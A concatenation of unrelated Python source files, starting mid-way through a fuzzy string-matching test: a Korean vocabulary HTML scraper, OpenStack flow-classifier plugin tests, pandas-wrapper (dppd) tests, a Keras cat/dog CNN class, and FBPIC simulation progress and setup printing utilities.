'switch to historylog', -1),
('switch to help', 'switch to help', -1),
('switch to ipython_console',
'switch to ipython_console', -1),
('switch to onlinehelp',
'switch to onlinehelp', -1),
('switch to outline_explorer',
'switch to outline_explorer', -1),
('switch to project_explorer',
'switch to project_explorer', -1),
('switch to variable_explorer',
'switch to variable_explorer', -1),
('use next layout', 'use next <b>lay</b>out',
400109),
('use previous layout',
'use previous <b>lay</b>out', 400113),
('clear line', 'clear line', -1),
('clear shell', 'clear shell', -1),
('inspect current object',
'inspect current object', -1),
('blockcomment', 'blockcomment', -1),
('breakpoint', 'breakpoint', -1),
('close all', 'close all', -1),
('code completion', 'code completion', -1),
('conditional breakpoint',
'conditional breakpoint', -1),
('configure', 'configure', -1),
('copy', 'copy', -1),
('copy line', 'copy line', -1),
('cut', 'cut', -1),
('debug', 'debug', -1),
('debug with winpdb', 'debug with winpdb', -1),
('delete', 'delete', -1),
('delete line', 'delete line', -1),
('duplicate line', 'duplicate line', -1),
('end of document', 'end of document', -1),
('end of line', 'end of line', -1),
('file list management',
'file list management', -1),
('find next', 'find next', -1),
('find previous', 'find previous', -1),
('find text', 'find text', -1),
('go to definition', 'go to definition', -1),
('go to line', 'go to line', -1),
('go to next file', 'go to next file', -1),
('go to previous file', 'go to previous file', -1),
('inspect current object',
'inspect current object', -1),
('kill next word', 'kill next word', -1),
('kill previous word', 'kill previous word', -1),
('kill to line end', 'kill to line end', -1),
('kill to line start', 'kill to line start', -1),
('last edit location', 'last edit location', -1),
('move line down', 'move line down', -1),
('move line up', 'move line up', -1),
('new file', 'new file', -1),
('next char', 'next char', -1),
('next cursor position',
'next cursor position', -1),
('next line', 'next line', -1),
('next word', 'next word', -1),
('open file', 'open file', -1),
('paste', 'paste', -1),
('previous char', 'previous char', -1),
('previous cursor position',
'previous cursor position', -1),
('previous line', 'previous line', -1),
('previous word', 'previous word', -1),
('print', 'print', -1),
('re-run last script', 're-run last script', -1),
('redo', 'redo', -1),
('replace text', 'replace text', -1),
('rotate kill ring', 'rotate kill ring', -1),
('run', 'run', -1),
('run selection', 'run selection', -1),
('save all', 'save all', -1),
('save as', 'save as', -1),
('save file', 'save file', -1),
('select all', 'select all', -1),
('show/hide outline', 'show/hide outline', -1),
('show/hide project explorer',
'show/hide project explorer', -1),
('start of document', 'start of document', -1),
('start of line', 'start of line', -1),
('toggle comment', 'toggle comment', -1),
('unblockcomment', 'unblockcomment', -1),
('undo', 'undo', -1), ('yank', 'yank', -1),
('run profiler', 'run profiler', -1),
('run analysis', 'run analysis', -1)]
def test_stringmatching_order_filter():
"""Test stringmatching ordered and filtered."""
template = '<b>{0}</b>'
names = ['close pane', 'debug continue', 'debug exit', 'debug step into',
'debug step over', 'debug step return', 'fullscreen mode',
'layout preferences', 'lock unlock panes', 'maximize pane',
'preferences', 'quit', 'restart', 'save current layout',
'switch to breakpoints', 'switch to console', 'switch to editor',
'switch to explorer', 'switch to find_in_files',
'switch to historylog', 'switch to help',
'switch to ipython_console', 'switch to onlinehelp',
'switch to outline_explorer', 'switch to project_explorer',
'switch to variable_explorer',
'use next layout', 'use previous layout', 'clear line',
'clear shell', 'inspect current object', 'blockcomment',
'breakpoint', 'close all', 'code completion',
'conditional breakpoint', 'configure', 'copy', 'copy line', 'cut',
'debug', 'debug with winpdb', 'delete', 'delete line',
'duplicate line', 'end of document', 'end of line',
'file list management', 'find next', 'find previous', 'find text',
'go to definition', 'go to line', 'go to next file',
'go to previous file', 'inspect current object', 'kill next word',
'kill previous word', 'kill to line end', 'kill to line start',
'last edit location', 'move line down', 'move line up',
'new file', 'next char', 'next cursor position', 'next line',
'next word', 'open file', 'paste', 'previous char',
'previous cursor position', 'previous line', 'previous word',
'print', 're-run last script', 'redo', 'replace text',
'rotate kill ring', 'run', 'run selection', 'save all', 'save as',
'save file', 'select all', 'show/hide outline',
'show/hide project explorer', 'start of document',
'start of line', 'toggle comment', 'unblockcomment', 'undo',
'yank', 'run profiler', 'run analysis']
order_filter_results = get_search_scores('lay', names, template=template,
valid_only=True, sort=True)
assert order_filter_results == [('layout preferences',
'<b>lay</b>out preferences', 400100),
('use next layout',
'use next <b>lay</b>out', 400109),
('save current layout',
'save current <b>lay</b>out', 400113),
('use previous layout',
'use previous <b>lay</b>out', 400113)]
if __name__ == "__main__":
pytest.main()
|
from bs4 import BeautifulSoup
def parseFile(filename):
with open(filename, 'r') as f:
html_text = f.read()
soup = BeautifulSoup(html_text, 'html.parser')
words = []
for s in soup.find_all("span", {"class": "collapseomatic"}):
korean = s.previous_sibling.previous_sibling.text
english = s.text
c = s.parent.find("div", {'class': "collapseomatic_content"})
if c == None:
c = s.parent.next_sibling
words.append({'korean': korean, 'english': english, 'examples': c.children})
return words
def printParse(words):
for word in words:
print(word["korean"], end="\t")
print(word["english"], end="\t")
for child in word["examples"]:
print(str(child).replace('\n', ' ').replace('\r', '').replace('\t', ''), end="")
print("")
def main():
for i in range(1, 25+1):
words = parseFile("./units/" + str(i) + ".html")
printParse(words)
main() |
# Copyright 2015 Futurewei. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
from unittest import mock
from networking_sfc.services.flowclassifier.common import context as fc_ctx
from networking_sfc.services.flowclassifier.common import exceptions as fc_exc
from networking_sfc.tests.unit.db import test_flowclassifier_db
FLOWCLASSIFIER_PLUGIN_KLASS = (
"networking_sfc.services.flowclassifier."
"plugin.FlowClassifierPlugin"
)
class FlowClassifierPluginTestCase(
test_flowclassifier_db.FlowClassifierDbPluginTestCase
):
def setUp(
self, core_plugin=None, flowclassifier_plugin=None, ext_mgr=None
):
if not flowclassifier_plugin:
flowclassifier_plugin = FLOWCLASSIFIER_PLUGIN_KLASS
self.driver_manager_p = mock.patch(
'networking_sfc.services.flowclassifier.driver_manager.'
'FlowClassifierDriverManager'
)
self.fake_driver_manager_class = self.driver_manager_p.start()
self.fake_driver_manager = mock.Mock()
self.fake_driver_manager_class.return_value = self.fake_driver_manager
self.plugin_context = None
self.plugin_context_precommit = None
self.plugin_context_postcommit = None
super(FlowClassifierPluginTestCase, self).setUp(
core_plugin=core_plugin,
flowclassifier_plugin=flowclassifier_plugin,
ext_mgr=ext_mgr
)
def _record_context(self, plugin_context):
self.plugin_context = plugin_context
def _record_context_precommit(self, plugin_context):
self.plugin_context_precommit = plugin_context
def _record_context_postcommit(self, plugin_context):
self.plugin_context_postcommit = plugin_context
def test_create_flow_classifier_driver_manager_called(self):
self.fake_driver_manager.create_flow_classifier_precommit = mock.Mock(
side_effect=self._record_context_precommit)
self.fake_driver_manager.create_flow_classifier_postcommit = mock.Mock(
side_effect=self._record_context_postcommit)
with self.port(
name='test1'
) as port:
with self.flow_classifier(flow_classifier={
'logical_source_port': port['port']['id']
}) as fc:
driver_manager = self.fake_driver_manager
(driver_manager.create_flow_classifier_precommit
.assert_called_once_with(mock.ANY))
(driver_manager.create_flow_classifier_postcommit
.assert_called_once_with(mock.ANY))
self.assertIsInstance(
self.plugin_context_precommit,
fc_ctx.FlowClassifierContext)
self.assertIsInstance(
self.plugin_context_postcommit,
fc_ctx.FlowClassifierContext)
self.assertIn('flow_classifier', fc)
self.assertEqual(
self.plugin_context_precommit.current,
fc['flow_classifier'])
self.assertEqual(
self.plugin_context_postcommit.current,
fc['flow_classifier'])
def test_create_flow_classifier_postcommit_driver_manager_exception(self):
self.fake_driver_manager.create_flow_classifier_postcommit = mock.Mock(
side_effect=fc_exc.FlowClassifierDriverError(
method='create_flow_classifier_postcommit'
)
)
with self.port(
name='test1'
) as port:
self._create_flow_classifier(
self.fmt, {'logical_source_port': port['port']['id']},
expected_res_status=500)
driver_manager = self.fake_driver_manager
(driver_manager.create_flow_classifier_precommit
.assert_called_once_with(mock.ANY))
(driver_manager.create_flow_classifier_postcommit
.assert_called_once_with(mock.ANY))
(driver_manager.delete_flow_classifier
.assert_called_once_with(mock.ANY))
(driver_manager.delete_flow_classifier_precommit
.assert_called_once_with(mock.ANY))
(driver_manager.delete_flow_classifier_postcommit
.assert_called_once_with(mock.ANY))
self._test_list_resources('flow_classifier', [])
def test_create_flow_classifier_precommit_driver_manager_exception(self):
self.fake_driver_manager.create_flow_classifier_precommit = mock.Mock(
side_effect=fc_exc.FlowClassifierDriverError(
method='create_flow_classifier_precommit'
)
)
with self.port(
name='test1'
) as port:
self._test_list_resources('flow_classifier', [])
self._create_flow_classifier(
self.fmt, {'logical_source_port': port['port']['id']},
expected_res_status=500)
self._test_list_resources('flow_classifier', [])
driver_manager = self.fake_driver_manager
(driver_manager.create_flow_classifier_precommit
.assert_called_once_with(mock.ANY))
(driver_manager.create_flow_classifier_postcommit
.assert_not_called())
driver_manager.delete_flow_classifier.assert_not_called()
(driver_manager.delete_flow_classifier_precommit
.assert_not_called())
(driver_manager.delete_flow_classifier_postcommit
.assert_not_called())
self._test_list_resources('flow_classifier', [])
def test_update_flow_classifier_driver_manager_called(self):
self.fake_driver_manager.update_flow_classifier_precommit = mock.Mock(
side_effect=self._record_context_precommit)
self.fake_driver_manager.update_flow_classifier_postcommit = mock.Mock(
side_effect=self._record_context_postcommit)
with self.port(
name='test1'
) as port:
with self.flow_classifier(flow_classifier={
'name': 'test1',
'logical_source_port': port['port']['id']
}) as fc:
req = self.new_update_request(
'flow_classifiers', {'flow_classifier': {'name': 'test2'}},
fc['flow_classifier']['id']
)
res = self.deserialize(
self.fmt,
req.get_response(self.ext_api)
)
driver_manager = self.fake_driver_manager
(driver_manager.update_flow_classifier_precommit
.assert_called_once_with(mock.ANY))
(driver_manager.update_flow_classifier_postcommit
.assert_called_once_with(mock.ANY))
self.assertIsInstance(
self.plugin_context_precommit,
fc_ctx.FlowClassifierContext)
self.assertIsInstance(self.plugin_context_postcommit,
fc_ctx.FlowClassifierContext)
self.assertIn('flow_classifier', fc)
self.assertIn('flow_classifier', res)
self.assertEqual(self.plugin_context_precommit.current,
res['flow_classifier'])
self.assertEqual(self.plugin_context_postcommit.current,
res['flow_classifier'])
self.assertEqual(self.plugin_context_precommit.original,
fc['flow_classifier'])
self.assertEqual(self.plugin_context_postcommit.original,
fc['flow_classifier'])
def _test_update_flow_classifier_driver_manager_exception(self, updated):
with self.port(
name='test1'
) as port:
with self.flow_classifier(flow_classifier={
'name': 'test1',
'logical_source_port': port['port']['id']
}) as fc:
self.assertIn('flow_classifier', fc)
original_flow_classifier = fc['flow_classifier']
req = self.new_update_request(
'flow_classifiers', {'flow_classifier': {'name': 'test2'}},
fc['flow_classifier']['id']
)
updated_flow_classifier = copy.copy(original_flow_classifier)
if updated:
updated_flow_classifier['name'] = 'test2'
res = req.get_response(self.ext_api)
self.assertEqual(500, res.status_int)
driver_manager = self.fake_driver_manager
(driver_manager.update_flow_classifier_precommit
.assert_called_once_with(mock.ANY))
if updated:
(driver_manager.update_flow_classifier_postcommit
.assert_called_once_with(mock.ANY))
else:
(driver_manager.update_flow_classifier_postcommit
.assert_not_called())
res = self._list('flow_classifiers')
self.assertIn('flow_classifiers', res)
self.assertItemsEqual(
res['flow_classifiers'], [updated_flow_classifier])
def test_update_flow_classifier_precommit_driver_manager_exception(self):
self.fake_driver_manager.update_flow_classifier_precommit = mock.Mock(
side_effect=fc_exc.FlowClassifierDriverError(
method='update_flow_classifier_precommit'
)
)
self._test_update_flow_classifier_driver_manager_exception(False)
def test_update_flow_classifier_postcommit_driver_manager_exception(self):
self.fake_driver_manager.update_flow_classifier_postcommit = mock.Mock(
side_effect=fc_exc.FlowClassifierDriverError(
method='update_flow_classifier_postcommit'
)
)
self._test_update_flow_classifier_driver_manager_exception(True)
def test_delete_flow_classifer_driver_manager_called(self):
self.fake_driver_manager.delete_flow_classifier = mock.Mock(
side_effect=self._record_context)
self.fake_driver_manager.delete_flow_classifier_precommit = mock.Mock(
side_effect=self._record_context_precommit)
self.fake_driver_manager.delete_flow_classifier_postcommit = mock.Mock(
side_effect=self._record_context_postcommit)
with self.port(
name='test1'
) as port:
with self.flow_classifier(
flow_classifier={'logical_source_port': port['port']['id']},
do_delete=False
) as fc:
req = self.new_delete_request(
'flow_classifiers', fc['flow_classifier']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(204, res.status_int)
driver_manager = self.fake_driver_manager
(driver_manager.delete_flow_classifier
.assert_called_once_with(mock.ANY))
(driver_manager.delete_flow_classifier_precommit
.assert_called_once_with(mock.ANY))
(driver_manager.delete_flow_classifier_postcommit
.assert_called_once_with(mock.ANY))
self.assertIsInstance(
self.plugin_context, fc_ctx.FlowClassifierContext
)
self.assertIsInstance(
self.plugin_context_precommit, fc_ctx.FlowClassifierContext
)
self.assertIsInstance(self.plugin_context_postcommit,
fc_ctx.FlowClassifierContext)
self.assertIn('flow_classifier', fc)
self.assertEqual(
self.plugin_context.current, fc['flow_classifier'])
self.assertEqual(self.plugin_context_precommit.current,
fc['flow_classifier'])
self.assertEqual(self.plugin_context_postcommit.current,
fc['flow_classifier'])
def _test_delete_flow_classifier_driver_manager_exception(self):
with self.port(
name='test1'
) as port:
with self.flow_classifier(flow_classifier={
'name': 'test1',
'logical_source_port': port['port']['id']
}, do_delete=False) as fc:
req = self.new_delete_request(
'flow_classifiers', fc['flow_classifier']['id']
)
res = req.get_response(self.ext_api)
self.assertEqual(500, res.status_int)
driver_manager = self.fake_driver_manager
driver_manager.delete_flow_classifier.assert_called_once_with(
mock.ANY
)
self._test_list_resources('flow_classifier', [fc])
def test_delete_flow_classifier_driver_manager_exception(self):
self.fake_driver_manager.delete_flow_classifier = mock.Mock(
side_effect=fc_exc.FlowClassifierDriverError(
method='delete_flow_classifier'
)
)
self._test_delete_flow_classifier_driver_manager_exception()
def test_delete_flow_classifier_precommit_driver_manager_exception(self):
self.fake_driver_manager.delete_flow_classifier_precommit = mock.Mock(
side_effect=fc_exc.FlowClassifierDriverError(
method='delete_flow_classifier_precommit'
)
)
self._test_delete_flow_classifier_driver_manager_exception()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from dppd import dppd
import pandas as pd
import pandas.testing
from plotnine.data import mtcars
__author__ = "Florian Finkernagel"
__copyright__ = "Florian Finkernagel"
__license__ = "mit"
assert_series_equal = pandas.testing.assert_series_equal
assert_frame_equal = pandas.testing.assert_frame_equal
dp, X = dppd()
def test_iloc():
df = pd.DataFrame(
{"a": list(range(10)), "bb": list(range(10)), "ccc": list(range(10))}
)
should = df.iloc[:3]
actual = dp(df).iloc[:3].pd
assert_frame_equal(should, actual)
def test_loc():
df = pd.DataFrame(
{"a": list(range(10)), "bb": list(range(10)), "ccc": list(range(10))}
).set_index("a")
should = df.loc[[3]]
actual = dp(df).loc[[3]].pd
assert_frame_equal(should, actual)
def test_loc_str():
df = pd.DataFrame(
{
"a": [str(x) for x in (range(10))],
"bb": list(range(10)),
"ccc": list(range(10)),
}
).set_index("a")
should = df.loc[["3"]]
actual = dp(df).loc[["3"]].pd
assert_frame_equal(should, actual)
def test_loc_returning_series():
df = pd.DataFrame(
{"a": list(range(10)), "bb": list(range(10)), "ccc": list(range(10))}
).set_index("a")
should = df.loc[3]
actual = dp(df).loc[3].pd
assert_series_equal(should, actual)
def test_at():
df = pd.DataFrame(
{
"a": [str(x) for x in (range(10))],
"bb": list(range(10)),
"ccc": list(range(10)),
}
).set_index("a")
value = dp(df).at["3", "bb"]
assert value == 3
def test_iat():
df = pd.DataFrame(
{
"a": [str(x) for x in (range(10))],
"bb": list(range(10)),
"ccc": list(range(10, 20)),
}
).set_index("a")
value = dp(df).iat[3, 0]
assert value == 3
def test_sample():
df = pd.DataFrame(
{"a": list(range(10)), "bb": list(range(10)), "ccc": list(range(10))}
).set_index("a")
should = df.sample(3, random_state=3)
actual = dp(df).sample(3, random_state=3).pd
assert_frame_equal(should, actual)
def test_index():
import dppd.base
df = pd.DataFrame(
{
"a": [str(x) for x in (range(10))],
"bb": list(range(10)),
"ccc": list(range(10)),
}
).set_index("a")
index = dp(df).index
assert (index == df.index).all()
assert not isinstance(index, dppd.base.DPPDAwareProxy)
def test_sort_values():
df = pd.DataFrame(
{
"a": [str(x) for x in (range(10))],
"bb": list(range(10)),
"ccc": list(range(10)),
}
).set_index("a")
should = df.sort_values("bb", ascending=False)
actual = dp(df).sort_values("bb", ascending=False).pd
assert_frame_equal(should, actual)
def test_assign():
df = pd.DataFrame(
{
"a": [str(x) for x in (range(10))],
"bb": list(range(10)),
"ccc": list(range(10)),
}
).set_index("a")
should = df.assign(d=df["ccc"] * 2)
actual = dp(df).assign(d=X["ccc"] * 2).pd
assert_frame_equal(should, actual)
def test_assign_in_order():
if (
pd.__version__ > "0.22.0"
): # can only assign within the same call starting with pandas 0.23
df = pd.DataFrame(
{"a": [str(x) for x in (range(10))], "bb": 10, "ccc": list(range(20, 30))}
).set_index("a")
should = df.assign(d=list(range(30, 40)))
should = should.assign(d2=lambda x: x["d"] + 2)
actual = dp(df).mutate(d=X["ccc"] + X["bb"], d2=lambda x: x["d"] + 2).pd
assert_frame_equal(should, actual)
def test_rename():
df = pd.DataFrame(
{"a": [str(x) for x in (range(10))], "bb": 10, "ccc": list(range(20, 30))}
)
with dppd(df) as (ndf, X):
ndf.rename(columns={"a": "a2", "bb": "ccc", "ccc": "c2"})
assert (X.columns == ["a2", "ccc", "c2"]).all()
def test_dataframe_subscript():
with dppd(mtcars) as (dp, X):
actual = dp.head(5)["name"].pd
should = mtcars["name"].head(5)
assert_series_equal(actual, should)
|
import tensorflow as tf
from numpy import pi
from keras.backend import sigmoid
from keras.models import Sequential, load_model
from keras.layers import Layer, InputLayer, Dense, Flatten, Activation, Conv2D, MaxPooling2D, LeakyReLU
from keras.callbacks import ModelCheckpoint, TensorBoard
from keras.optimizers import Adam
from keras.backend import get_session
from keras.utils.generic_utils import get_custom_objects
import os
from glob import glob
class Model:
def __init__(self,
input_shape=(224, 224, 3),
num_classes=2,
checkpoint_path="./checkpoint",
batch_size=32,
epochs=10,
learning_rate=0.001):
"""
input_shape - In HWC format
"""
self.model = Sequential()
self.input_shape = input_shape
self.num_classes = num_classes
self.checkpoint_path = checkpoint_path
self.batch_size = batch_size
self.learning_rate = learning_rate
self.epochs = epochs
get_custom_objects().update({'gelu_activation': Activation(self.gelu_activation)})
def build_model(self):
self.model.add(InputLayer(input_shape=self.input_shape))
self.model.add(Conv2D(32, kernel_size=(3, 3), activation='linear',
input_shape=self.input_shape, padding='same'))
self.model.add(Activation('relu'))
self.model.add(MaxPooling2D((2, 2), padding='same'))
self.model.add(Conv2D(64, (3, 3), activation='linear', padding='same'))
self.model.add(Activation('relu'))
self.model.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
self.model.add(
Conv2D(128, (3, 3), activation='linear', padding='same'))
self.model.add(Activation('relu'))
self.model.add(MaxPooling2D(pool_size=(2, 2), padding='same'))
self.model.add(Flatten())
self.model.add(Dense(128, activation="linear"))
self.model.add(Activation('gelu_activation', name='GeluActivation'))
self.model.add(Dense(self.num_classes, activation='softmax'))
opt = Adam(learning_rate=0.001, beta_1=0.9, beta_2=0.999, amsgrad=False)
self.model.compile(optimizer=opt,
loss='binary_crossentropy',
metrics=['accuracy'])
print("Model built and compiled successfully")
@staticmethod
def gelu_activation(_input, alpha=1):
return 0.5 * _input * (alpha + tf.tanh(tf.sqrt(2 / pi) * (_input + 0.044715 * _input * _input * _input)))
def train_model(self, train_data_gen, valid_data_gen):
checkpoint_dir = os.path.dirname(self.checkpoint_path)
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
tensorboard_dir = os.path.join(checkpoint_dir, 'tensorboard')
if not os.path.exists(tensorboard_dir):
os.makedirs(tensorboard_dir)
# Create a callback that saves the model's weights
cp_callback = ModelCheckpoint(filepath=self.checkpoint_path, save_weights_only=True, verbose=1, period=1)
# cp_callback = ModelCheckpoint(filepath=self.checkpoint_path, monitor='val_acc', verbose=1,
# save_best_only=True, mode='max')
tb_callback = TensorBoard(log_dir=tensorboard_dir, histogram_freq=0, write_graph=True, write_images=False)
self.model.fit_generator(
train_data_gen,
steps_per_epoch=train_data_gen.samples // self.batch_size,
epochs=self.epochs,
validation_data=valid_data_gen,
validation_steps=valid_data_gen.samples // self.batch_size,
callbacks=[cp_callback, tb_callback])
def convert_checkpoint(self, final_checkpoint):
checkpoint_dir = os.path.dirname(final_checkpoint)
basename = os.path.basename(final_checkpoint).split(".")[0]
save_path = os.path.join(checkpoint_dir, "tf_ckpt", "final_model.ckpt")
# Add ops to save and restore all the variables.
saver = tf.train.Saver()
self.model.load_weights(final_checkpoint)
sess = get_session()
saver.save(sess, save_path)
def save_frozen(self, frozen_filename):
# First freeze the graph and remove training nodes.
output_names = self.model.output.op.name
sess = get_session()
frozen_graph = tf.graph_util.convert_variables_to_constants(sess, sess.graph.as_graph_def(), [output_names])
frozen_graph = tf.graph_util.remove_training_nodes(frozen_graph)
# Save the model
with open(frozen_filename, "wb") as ofile:
ofile.write(frozen_graph.SerializeToString())
def prediction(self, test_data_path):
from PIL import Image
import numpy as np
test_images = glob(os.path.join(test_data_path, "*.jpg"))
for impath in test_images:
img = Image.open(impath)
img = img.resize(self.input_shape[:2])
img = np.expand_dims(np.array(img), axis=0) / 255.0
output = self.model.predict(img, batch_size=1)
print(output)
pred = np.argmax(output)
basename = os.path.basename(impath)
if pred:
print("{} : Prediction - Dog".format(basename))
else:
print("{} : Prediction - Cat".format(basename))
def test_case():
try:
model = Model()
model.build_model()
return True
except Exception as e:
print(e)
return False
def test_case2():
final_checkpoint = "/home/codesteller/workspace/ml_workspace/trt-custom-plugin/saved_model/" \
"checkpoints/saved_model-0001.h5"
model = Model(input_shape=(150, 150, 3))
model.build_model()
model.convert_checkpoint(final_checkpoint)
print("done")
def test_case3():
final_checkpoint = "/home/codesteller/workspace/ml_workspace/trt_ws/trt-custom-plugin/saved_model/" \
"checkpoints/saved_model-0005.h5"
test_data = "../test_data"
cnn_model = Model(input_shape=(150, 150, 3))
cnn_model.build_model()
cnn_model.model.load_weights(final_checkpoint)
# cnn_model.convert_checkpoint(final_checkpoint)
cnn_model.prediction(test_data)
if __name__ == "__main__":
# if test_case():
# print("Test Case Passed")
# else:
# print("Test Case Passed")
#
# test_case2()
test_case3()
|
# Copyright 2016, FBPIC contributors
# Authors: Remi Lehe, Manuel Kirchen, Kevin Peters, Soeren Jalas
# License: 3-Clause-BSD-LBNL
"""
Fourier-Bessel Particle-In-Cell (FB-PIC) main file
It defines a set of generic functions for printing simulation information.
"""
import sys, time
from fbpic import __version__
from fbpic.utils.mpi import MPI, mpi_installed, gpudirect_enabled
from fbpic.utils.cuda import cuda, cuda_installed, get_uuid
if cuda_installed:
from cupy.cuda.memory import OutOfMemoryError
# Check if terminal is correctly set to UTF-8 and set progress character
if sys.stdout.encoding == 'UTF-8':
progress_char = u'\u2588'
else:
progress_char = '-'
class ProgressBar(object):
"""
ProgressBar class that keeps track of the time spent by the algorithm.
It handles the calculation and printing of the progress bar and a
summary of the total runtime.
"""
def __init__(self, N, n_avg=20, Nbars=35, char=progress_char):
"""
Initializes a timer / progression bar.
Timing is done with respect to the absolute time at initialization.
Parameters
----------
N: int
The total number of iterations performed by the step loop
n_avg: int, optional
The amount of recent timesteps used to calculate the average
time taken by a step
Nbar: int, optional
The number of bars printed for the progression bar
char: str, optional
The character used to show the progression.
"""
self.N = N
self.n_avg = n_avg
self.Nbars = Nbars
self.bar_char = char
# Initialize variables to measure the time taken by the simulation
self.i_step = 0
self.start_time = time.time()
self.prev_time = self.start_time
self.total_duration = 0.
self.time_per_step = 0.
self.avg_time_per_step = 0.
self.eta = None
def time( self, i_step ):
"""
Calculates the time taken by the last iterations, the average time
taken by the most recent iterations and the estimated remaining
simulation time.
Parameters
----------
i_step : int
The current iteration of the loop
"""
# Register current step
self.i_step = i_step
# Calculate time taken by last step
curr_time = time.time()
self.total_duration = curr_time - self.start_time
self.time_per_step = curr_time - self.prev_time
# Estimate average time per step
self.avg_time_per_step += \
(self.time_per_step - self.avg_time_per_step)/self.n_avg
if self.i_step <= 2:
# Ignores first step in time estimation (compilation time)
self.avg_time_per_step = self.time_per_step
# Estimated time in seconds until it will finish
if self.i_step < self.n_avg:
self.eta = None
else:
self.eta = self.avg_time_per_step*(self.N-self.i_step)
# Advance the previous time to the current time
self.prev_time = curr_time
def print_progress( self ):
"""
Prints a progression bar with the estimated
remaining simulation time and the time taken by the last step.
"""
i = self.i_step
# Print progress bar
if i == 0:
# Let the user know that the first step is much longer
sys.stdout.write('\r' + \
'Just-In-Time compilation (up to one minute) ...')
sys.stdout.flush()
else:
# Print the progression bar
nbars = int( (i+1)*1./self.N*self.Nbars )
sys.stdout.write('\r|' + nbars*self.bar_char )
sys.stdout.write((self.Nbars-nbars)*' ')
sys.stdout.write('| %d/%d' %(i+1,self.N))
if self.eta is None:
# Time estimation is only printed after n_avg timesteps
sys.stdout.write(', calc. ETA...')
else:
# Conversion to H:M:S
m, s = divmod(self.eta, 60)
h, m = divmod(m, 60)
sys.stdout.write(', %d:%02d:%02d left' % (h, m, s))
# Time taken by the last step
sys.stdout.write(', %d ms/step' %(self.time_per_step*1.e3))
sys.stdout.flush()
# Clear line
sys.stdout.write('\033[K')
def print_summary( self ):
"""
Print a summary about the total runtime of the simulation.
"""
avg_tps = (self.total_duration / self.N)*1.e3
m, s = divmod(self.total_duration, 60)
h, m = divmod(m, 60)
print('\nTotal time taken (with compilation): %d:%02d:%02d' %(h, m, s))
print('Average time per iteration ' \
'(with compilation): %d ms\n' %(avg_tps))
# -----------------------------------------------------
# Print utilities
# -----------------------------------------------------
def print_simulation_setup( sim, verbose_level=1 ):
"""
Print information about the simulation.
- Version of FBPIC
- CPU or GPU computation
- Number of parallel MPI domains
- Number of threads in case of CPU multi-threading
- (Additional detailed information)
Parameters
----------
sim: an fbpic Simulation object
Contains all the information of the simulation setup
verbose_level: int, optional
Level of detail of the simulation information
0 - Print no information
1 (Default) - Print basic information
2 - Print detailed information
"""
if verbose_level > 0:
# Print version of FBPIC
message = '\nFBPIC (%s)\n'%__version__
# Basic information
if verbose_level == 1:
# Print information about computational setup
if sim.use_cuda:
message += "\nRunning on GPU "
else:
message += "\nRunning on CPU "
if sim.comm.size > 1:
message += "with %d MPI processes " %sim.comm.size
if sim.use_threading and not sim.use_cuda:
message += "(%d threads per process) " %sim.cpu_threads
# Detailed information
elif verbose_level == 2:
# Information on MPI
if mpi_installed:
message += '\nMPI available: Yes'
message += '\nMPI processes used: %d' %sim.comm.size
message += '\nMPI Library Information: \n%s' \
%MPI.Get_library_version()
else:
message += '\nMPI available: No'
# Information on Cuda
if cuda_installed:
message += '\nCUDA available: Yes'
else:
message += '\nCUDA available: No'
# Information about the architecture and the node used
if sim.use_cuda:
message += '\nCompute architecture: GPU (CUDA)'
if mpi_installed:
if gpudirect_enabled:
message += '\nCUDA GPUDirect (MPI) enabled: Yes'
else:
message += '\nCUDA GPUDirect (MPI) enabled: No'
node_message = get_gpu_message()
else:
message += '\nCompute architecture: CPU'
if sim.use_threading:
message += '\nCPU multi-threading enabled: Yes'
message += '\nThreads: %s' %sim.cpu_threads
else:
message += '\nCPU multi-threading enabled: No'
if sim.fld.trans[0].fft.use_mkl:
message += '\nFFT library: MKL'
else:
message += '\nFFT library: pyFFTW'
node_message = get_cpu_message()
# Gather the information about where each node runs
if sim.comm.size > 1:
node_messages = sim.comm.mpi_comm.gather( node_message )
if sim.comm.rank == 0:
node_message = ''.join( node_messages )
message += node_message
message += '\n'
# Information on the numerical algorithm
if sim.fld.n_order == -1:
message += '\nPSATD stencil order: infinite'
else:
message += '\nPSATD stencil order: %d' %sim.fld.n_order
message += '\nParticle shape: %s' %sim.particle_shape
message += '\nLongitudinal boundaries: %s' %sim.comm.boundaries['z']
message += '\nTransverse boundaries: %s' %sim.comm.boundaries['r']
message += '\nGuard region size: %d ' %sim.comm.n_guard+'cells'
message += '\nDamping region size: %d ' %sim.comm.nz_damp+'cells'
message += '\nInjection region size: %d ' %sim.comm.n_inject+'cells'
message += '\nParticle exchange period: every %d ' \
%sim.comm.exchange_period + 'step'
if sim.boost is not None:
message += '\nBoosted frame: Yes'
message += '\nBoosted frame gamma: %d' %sim.boost.gamma0
if sim.use_galilean:
message += '\nGalilean frame: Yes'
else:
message += '\nGalilean frame: No'
else:
message += '\nBoosted frame: False'
message += '\n'
# Only processor 0 prints the message:
if sim.comm.rank == 0:
print( message )
def print_available_gpus():
"""
Lists all available CUDA GPUs.
"""
cuda.detect()
def get_gpu_message():
"""
Returns a string with information about the currently selected GPU.
"""
gpu = cuda.gpus.current
# Convert bytestring to actual string
try:
gpu_name = gpu.name.decode()
except AttributeError:
gpu_name = gpu.name
# Print the GPU that is being used
if MPI.COMM_WORLD.size > 1:
rank = MPI.COMM_WORLD.rank
node = MPI.Get_processor_name()
message = "\nMPI rank %d selected a %s GPU with id %s on node %s" %(
rank, gpu_name, gpu.id, node)
else:
message = "\nFBPIC selected a %s GPU with id %s" %( gpu_name, gpu.id )
if mpi_installed:
node = MPI.Get_processor_name()
message += " on node %s" %node
# Print the GPU UUID, if available
uuid = get_uuid(gpu.id)
if uuid is not None:
message += "\n(GPU UUID: %s)" % uuid
return(message)
def get_cpu_message():
"""
Returns a string with information about the node of each MPI rank
"""
# Print the node that is being used
if MPI.COMM_WORLD.size > 1:
rank = MPI.COMM_WORLD.rank
node = MPI.Get_processor_name()
message = "\nMPI rank %d runs on node %s" %(rank, node)
else:
message = ""
return(message)
